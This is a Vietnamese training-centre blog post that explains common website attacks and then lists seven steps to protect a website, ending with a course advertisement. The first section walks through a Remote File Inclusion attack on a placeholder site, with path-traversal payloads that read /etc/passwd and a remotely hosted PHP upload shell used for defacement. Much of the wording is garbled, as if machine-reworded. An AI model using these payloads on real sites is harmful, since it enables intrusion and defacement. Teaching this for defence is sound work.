Hacker đã Hack các website ra sao? Và cách chống hack trang web

19:52 15-04-2021

BKAP Media

Có lẽ, ai trong chúng ta cũng từng thấy 1 trang web bị hack (tấn công) và thay đổi giao diện hiển thị là anonymous, haked by xyz… Vậy làm thế nào các hacker có thể làm được điều đó? Hiểu được cách thức hacker tấn công webiste từ đó đưa ra cách phòng chống hack!

1. CÁC WEBSITE ĐÃ BỊ HACK RA SAO?

Cho tới hiện tại thì có 3 cách thông dụng :

  • Reomote File Include (RFI)
  • SQL injection
  • Cross-site Scripting

Đặc điểm cả 3 đều triển khai upload file hay còn gọi là tải file ô nhiễm lên server thậm chí còn PHP, HTML, JS, …. Đầu tiên tất cả chúng ta đi đến cách tiên phong : Remote File Include ( RFI )Lỗ hổng File Inclusion được cho phép tin tặc truy vấn trái phép vào những tập tin nhạy cảm trên sever web hoặc thực thi các tệp ô nhiễm bằng cách sử dụng tính năng “ include ”. Lỗ hổng này xảy ra do chính sách kiểm tra nguồn vào không được thực thi tốt, khiến tin tặc hoàn toàn có thể khai thác và chèn các tài liệu ô nhiễm .Bắt đầu thôi !Ví dụ ta có site này

   abc. com/index.php?page=photos.php 

Giải thích như sau : trang PHP kia sẽ đọc file từ photos.php mà biến page đã được gán. Lúc này nếu sơ hở không lọc kỹ càng, các hacker sẽ tận dụng lỗ hổng này để khai thác và đoc nhiều file nhạy cảm hơn password .Đến đây ta thử thành đường dẫn google

   abc. com/index.php?page=http:// google.com 

Tada, hiên ra nguyên trang search google

hacker hack trang web như thế nào

Vậy là index.php không lọc input nguồn vào, ta hoàn toàn có thể đọc được file password không ? Ban đầu mình thử etc / passwd

   abc. com/index.php?page=etc/passwd 

Kết quả khoog show ra gì. Tiếp tục sử dụng kĩ thuật path lên 1 thư mục bằng .. /

   abc. com/index.php?page=../etc/passwd 

Vẫn không hiện, liên tục path

   abc. com/index.php?page=../../etc/passwd 

Cuối cùng, nguyên passwd đã lộ ra sau 2 lần thử

hacker hack trang web như thế nào

Chưa dừng lại ở đây. Nếu hoàn toàn có thể đọc được bất kể file nào. Sao ta không thử đọc 1 file với mục tiêu upload file lên server. Chuẩn bị 1 file uploadShell. php. Copy code vào pastebin nhằm mục đích mục tiêu lấy link. Sau một hồi ta được 1 link với code php để upload file, được tác dụng như sau :

   abc. com/index.php?page=https:// pastebin. com/xyz 

Giờ chỉ cần tới quy trình up file bất kể nào lên thôi tùy mục tiêu của hacker. Trong video mình muốn ghi đè file dispo_call. php nên mình đã tạo 1 file php y chang nhưng source code là trang web giao diện thông tin trang web này đã bị hack. Cuối cùng thành công xuất sắc, triển khai xong thử thách .

hacker đã hack trang web như thế nào

CHỐNG HACK TRANG WEBSITE VỚI 7 BƯỚC SAU:

Nếu bạn là chủ một website, còn điều gì đáng sợ hơn việc một ngày bạn phát hiện website bị hack. Vậy làm thế nào để hạn chế và phòng chống hack website? Ngoài việc thường xuyên sao lưu các tập tin của mình, bảy bước sau đây sẽ giúp bạn bảo mật web tốt hơn và phòng chống hack website.

1. Luôn cập nhật website

Điều tiên phong bạn nên làm để phòng chống hack website là bảo vệ rằng website của bạn được update phiên bản mới nhất. Bởi vì nhiều công cụ được tạo ra dưới dạng các chương trình ứng dụng mã nguồn mở, mã code của các công cụ này rất dễ sử dụng cho cả các nhà tăng trưởng cũng như các hacker mũ đen. Các hacker hoàn toàn có thể xem các mã này, tìm kiếm những lỗ hổng bảo mật thông tin và khai thác để tiến công các website. Người dùng WordPress hoàn toàn có thể kiểm tra các bản update một cách nhanh gọn khi họ đăng nhập vào bảng tinh chỉnh và điều khiển WordPress của họ .

Thông báo update trên nền tảng WordPress mà bạn không nên bỏ lỡ

Thông báo update trên nền tảng WordPress mà bạn không nên bỏ lỡ

2. Giải pháp chống hack website

Khi bạn đã update tổng thể mọi thứ, hãy tăng cường bảo mật thông tin trang web của bạn với các plugin chuyên sử dụng để ngăn ngừa các nỗ lực tìm cách xâm nhập. Chi tiêu phòng chống luôn rẻ hơn. Tìm kiếm một nền tảng bảo mật an ninh mạng uy tín. Với giải pháp cung ứng rất nhiều tính năng bảo mật thông tin ưu việt. Từ việc quét và phát hiện các lỗ hổng bảo mật thông tin trang, giám sát website liên tục 24/7 cho đến việc phát hiện và làm sạch mã độc hay thiết kế xây dựng tường lửa bảo vệ website. Nếu doanh nghiệp của bạn hoạt động giải trí dựa vào trang web của mình. Đây chắc như đinh là một khoản góp vốn đầu tư đáng để xem xét .

3. Sử dụng HTTPS

Kích hoạt HTTPS cho website của mình .

4. Sử dụng Parameter để truy vấn CSDL

Một trong những thủ pháp phổ cập khiến các website bị hack là tiến công SQL Injection. Tin tặc hoàn toàn có thể khai thác SQL Injection trải qua các tham số và form trên website của bạn. Tin tặc hoàn toàn có thể tiến công vào cơ sở dữ liệu – nơi hoàn toàn có thể chứa thông tin người mua nhạy cảm như thông tin liên lạc hoặc số thẻ tín dụng thanh toán. Rõ ràng bảo mật thông tin những thông tin đó là trách nhiệm của bạn. Có một số ít bước bạn hoàn toàn có thể triển khai để bảo vệ trang web của bạn khỏi SQL Injection. Một trong những điều quan trọng nhất và dễ thực thi nhất là sử dụng truy vấn PARAMETER. Bạn nên sử dụng các thư viện ORM để setup chính sách Parameter này .

5. Sử dụng CSP

Tương tự như SQL Injection, XSS cũng là một lỗ hổng cực kỳ nguy hiểm. Chúng xuất hiện khi các hacker tìm cách để đưa mã JavaScript độc hại vào trang web. Thực thi trên máy người dùng để đánh cắp phiên đăng nhập hoặc cài đặt mã độc. Để bảo vệ trang web của bạn khỏi các cuộc tấn công XSS, một công cụ hữu ích giúp bạn tự bảo vệ mình khỏi XSS là CSP (Content Security Policy – CSP). Sử dụng CSP chỉ đơn giản là vấn đề bổ sung đúng tiêu đề HTTP cho trang web của bạn, cung cấp một chuỗi các chỉ thị cho biết trình duyệt có tên miền nào là ổn và bất kỳ ngoại lệ nào đối với quy tắc này. Bạn có thể tìm thấy các chi tiết về cách tạo tiêu đề CSP cho trang web của bạn do Mozilla cung cấp.

6. Mật khẩu an toàn

Điều này nghe có vẻ như đơn thuần, nhưng nó rất quan trọng. Bạn muốn tạo mật khẩu mà bạn biết sẽ luôn luôn thuận tiện để bạn nhớ. Đó là nguyên do tại sao mật khẩu # 1 thông dụng nhất vẫn là 123456. Tuy nhiên bạn phải khiến nó phức tạp hơn rất nhiều. Nên sử dụng một hỗn hợp các ký tự đặc biệt quan trọng, số và vần âm. Và tránh xa những từ khóa hoàn toàn có thể dễ đoán đoán như ngày sinh nhật của bạn hoặc tên của con cháu … .. Nếu một hacker nào đó có được quyền truy vấn vào các thông tin khác về bạn, họ sẽ biết để đoán ra. Và bảo vệ rằng tổng thể những ai có quyền truy vấn vào trang web của bạn đều có mật khẩu bảo mật thông tin tựa như. Đặt ra các nhu yếu về độ dài và loại ký tự mà mọi người cần phải sử dụng để họ phải phát minh sáng tạo hơn là việc liên tục sử dụng các mật khẩu tiêu chuẩn, dễ đoán gây nên các yếu tố nghiêm trọng về bảo mật thông tin và khiến cho website bị hack .

7. Phân quyền truy cập chặt chẽ

Bây giờ, đối với bước cuối cùng này, có thể chúng ta sẽ đòi hỏi phải biết một chút về kỹ thuật. Tất cả các trang web có thể được tạo bởi một loạt các tập tin và thư mục được lưu trữ trên máy chủ. Bên cạnh việc chứa tất cả các tập lệnh và dữ liệu cần thiết để làm cho trang web của bạn hoạt động. Mỗi tập tin và thư mục phải được gán cho một tập hợp các quyền thực thi nhất định. Bạn phải chắc chắn kiểm soát việc ai có thể đọc, ghi và thực thi các tệp tin trên máy chủ. Nên thiết lập 1 tài khoản máy chủ riêng để chạy dịch vụ website của bạn.

> Chọn Bachkhoa-Aptech – Cán đích sự nghiệp An ninh mạng: https://bit.ly/2L0TreC

  • HỆ THỐNG ĐÀO TẠO CNTT QUỐC TẾ BACHKHOA-APTECH
  • Hotline: 0968276996
  • Địa chỉ: 238 Hoàng Quốc Việt, Bắc Từ Liêm, Hà Nội